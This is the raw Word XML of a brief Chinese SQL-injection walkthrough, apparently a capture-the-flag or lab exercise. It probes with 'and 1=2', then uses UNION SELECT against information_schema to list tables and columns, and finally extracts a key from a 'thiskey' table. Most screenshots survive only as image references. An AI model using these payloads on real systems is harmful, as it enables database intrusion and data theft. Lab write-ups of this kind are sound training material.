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A285F" w14:textId="77777777" w:rsidR="00BA3B64" w:rsidRDefault="00BA3B64" w:rsidP="00BA3B64">
      <w:r>
        <w:t>/************************************************************/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329BC876" w14:textId="77777777" w:rsidR="00BA3B64" w:rsidRDefault="00BA3B64" w:rsidP="00BA3B64">
      <w:r>
        <w:t>/*                程序作者：爱的伊苏                        */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D662BC3" w14:textId="77777777" w:rsidR="00BA3B64" w:rsidRDefault="00BA3B64" w:rsidP="00BA3B64">
      <w:r>
        <w:t>/*                程序完成时间：2019/1/18                   */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A9A9F5" w14:textId="77777777" w:rsidR="00BA3B64" w:rsidRDefault="00BA3B64" w:rsidP="00BA3B64">
      <w:r>
        <w:t>/*                有任何问题请联系：740531307@qq.com        */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEA1F34" w14:textId="77777777" w:rsidR="00BA3B64" w:rsidRDefault="00BA3B64" w:rsidP="00BA3B64">
      <w:r>
        <w:t>/************************************************************/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BBE9D5" w14:textId="77777777" w:rsidR="00BA3B64" w:rsidRDefault="00BA3B64" w:rsidP="00BA3B64">
      <w:r>
        <w:t>//@永远得意的笑下去</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2743245F" w14:textId="74AB22A2" w:rsidR="00E474C9" w:rsidRDefault="00E474C9"/>
    <w:p w14:paraId="645CA001" w14:textId="30E5E7A9" w:rsidR="00BA3B64" w:rsidRDefault="00727400">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CA2CCD9" wp14:editId="43550D24">
            <wp:extent cx="5274310" cy="10210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001A" w14:textId="21B9EEED" w:rsidR="00727400" w:rsidRDefault="00727400">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>nd1=2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面明显不同，所以推断可能存在注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3213A346" w14:textId="77777777" w:rsidR="009D7327" w:rsidRDefault="009D7327"/>
    <w:p w14:paraId="3B0E286E" w14:textId="1B3A9931" w:rsidR="00B0485F" w:rsidRDefault="009D7327">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="520F3A88" wp14:editId="6BC5640F">
            <wp:extent cx="5274310" cy="10979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5313" w14:textId="6A77EEFE" w:rsidR="009D7327" w:rsidRDefault="009D7327">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E0CAD3" w14:textId="1F5E86F3" w:rsidR="00384557" w:rsidRPr="00384557" w:rsidRDefault="00384557" w:rsidP="003845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5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20942A" wp14:editId="2787CA09">
            <wp:extent cx="5274310" cy="5484495"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="4" name="图片 4" descr="C:\Users\Administrator\AppData\Roaming\Tencent\Users\740531307\TIM\WinTemp\RichOle\%0RF`L9HG46MF`[]UBR31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40531307\TIM\WinTemp\RichOle\%0RF`L9HG46MF`[]UBR31S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8655C" w14:textId="5794B7CD" w:rsidR="00384557" w:rsidRDefault="007C27C6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union select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table_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schema,table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_name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from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information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7F5C0E6F" w14:textId="09A2A5CC" w:rsidR="00144D20" w:rsidRDefault="00144D20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14:paraId="0A5C68AF" w14:textId="23FCA21B" w:rsidR="00144D20" w:rsidRPr="00144D20" w:rsidRDefault="00144D20" w:rsidP="00144D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4D2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1873080" wp14:editId="3F4DBA9B">
            <wp:extent cx="5274310" cy="3594100"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="5" name="图片 5" descr="C:\Users\Administrator\AppData\Roaming\Tencent\Users\740531307\TIM\WinTemp\RichOle\`%)5Z5ERE13{~0Z82W27(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740531307\TIM\WinTemp\RichOle\`%)5Z5ERE13{~0Z82W27(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F451F" w14:textId="77777777" w:rsidR="00144D20" w:rsidRDefault="00144D20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</w:p>
    <w:p w14:paraId="16115652" w14:textId="2DE39876" w:rsidR="00144D20" w:rsidRDefault="00144D20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union select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table_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name,column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_name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from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information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="32C18E19" w14:textId="72A41EB6" w:rsidR="00144D20" w:rsidRPr="00144D20" w:rsidRDefault="00144D20" w:rsidP="00144D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4D2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B841D0" wp14:editId="1CDD58CB">
            <wp:extent cx="5274310" cy="1450340"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="6" name="图片 6" descr="C:\Users\Administrator\AppData\Roaming\Tencent\Users\740531307\TIM\WinTemp\RichOle\987OHZ@U@7]V3(OAXI`_YP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740531307\TIM\WinTemp\RichOle\987OHZ@U@7]V3(OAXI`_YP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CB89E" w14:textId="5223D34B" w:rsidR="00144D20" w:rsidRPr="00384557" w:rsidRDefault="00144D20">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b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union select 1,k0y from thiskey</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00144D20" w:rsidRPr="003845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9F"/>
    <w:rsid w:val="00144D20"/>
    <w:rsid w:val="001938D0"/>
    <w:rsid w:val="00384557"/>
    <w:rsid w:val="00727400"/>
    <w:rsid w:val="007C27C6"/>
    <w:rsid w:val="009D7327"/>
    <w:rsid w:val="00B0485F"/>
    <w:rsid w:val="00BA3B64"/>
    <w:rsid w:val="00D6399F"/>
    <w:rsid w:val="00E4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63EFB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3CC44FCA-8FF7-43E2-A0C1-0C11346E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B1CE-7374-4D66-977C-0B30B264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9-01-18T10:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-01-18T12:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>